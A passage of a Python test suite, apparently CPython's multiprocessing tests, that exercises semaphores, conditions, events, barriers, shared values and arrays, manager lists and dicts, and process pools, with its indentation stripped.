self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
